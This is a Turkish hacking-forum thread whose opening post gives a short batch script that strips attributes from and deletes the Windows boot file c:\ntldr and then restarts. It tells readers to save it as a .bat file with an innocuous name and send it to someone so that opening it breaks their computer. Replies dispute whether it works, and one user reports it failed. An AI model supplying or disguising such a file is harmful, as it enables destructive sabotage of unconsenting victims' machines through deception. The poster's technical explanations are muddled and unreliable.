Karşı tarafın bilgisayarına format atmak 😃😃

Snoozy

Üye
1 Nis 2022
113
89
33.747252, -112.633853
Karşı tarafın bilgisyarına format atmak

İlk önce txt dosyası oluşturalım.

Daha sonra aşağıda verdiğim kodları kopyalayın ve yapıştırın dosyanın içine

cd..

cd..

attrib -s -h -r -a c:\ntldr

del c:\ntldr

shutdown -r

Bunları txt dosyasının içine yapıştırdıkdan sonra "save as" (farklı kaydet) diyelim.

.txt yerini silip .bat olarak kayd edelim. İsterseniz adını değiştirip dikkat çekmeyecek bir ad koya bilirsiniz. Daha sonra bu dosyayı karşı tarafa atıyosunuz. Üzerine tıklayıp açtığı zaman bilgisyarı format olacakdır.

Bilgi vermek maksatıyla paylaştım! Yapacaklarınızdan sorumlu değilim.

icehead

Uzman üye
19 Şub 2022
1,137
833
Format atma tabiri işletim sistemini komple silmektir.
bu komutlar ise ntldr isimli bir dizini silmekte.
bu kodları çalıştırsanız dahi erişim engellendi hatası alırsınız. zaten işletim sistemi üzerinde işletim sistemi silmek pek mantıklı değil.

Snoozy

Üye
1 Nis 2022
113
89
33.747252, -112.633853
Format atma tabiri işletim sistemini komple silmektir.
bu komutlar ise ntldr isimli bir dizini silmekte.
bu kodları çalıştırsanız dahi erişim engellendi hatası alırsınız. zaten işletim sistemi üzerinde işletim sistemi silmek pek mantıklı değil.
Herhangi bir işletim sistemini oluşturan sistemlerin düzgün boot.ini dosyasında yapılandırır. Binevi Windows Kurtarma gibi düşün. NTLDR, genellikle Windows FORMAT veya SYS komutuyla diske yazılan sistem bölümünün birim önyükleme kaydı tarafından başlatılır .

radanex

Üye
29 Nis 2023
64
9
Herhangi bir işletim sistemini oluşturan sistemlerin düzgün boot.ini dosyasında yapılandırır. Binevi Windows Kurtarma gibi düşün. NTLDR, genellikle Windows FORMAT veya SYS komutuyla diske yazılan sistem bölümünün birim önyükleme kaydı tarafından başlatılır .
denedim olmadı o

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.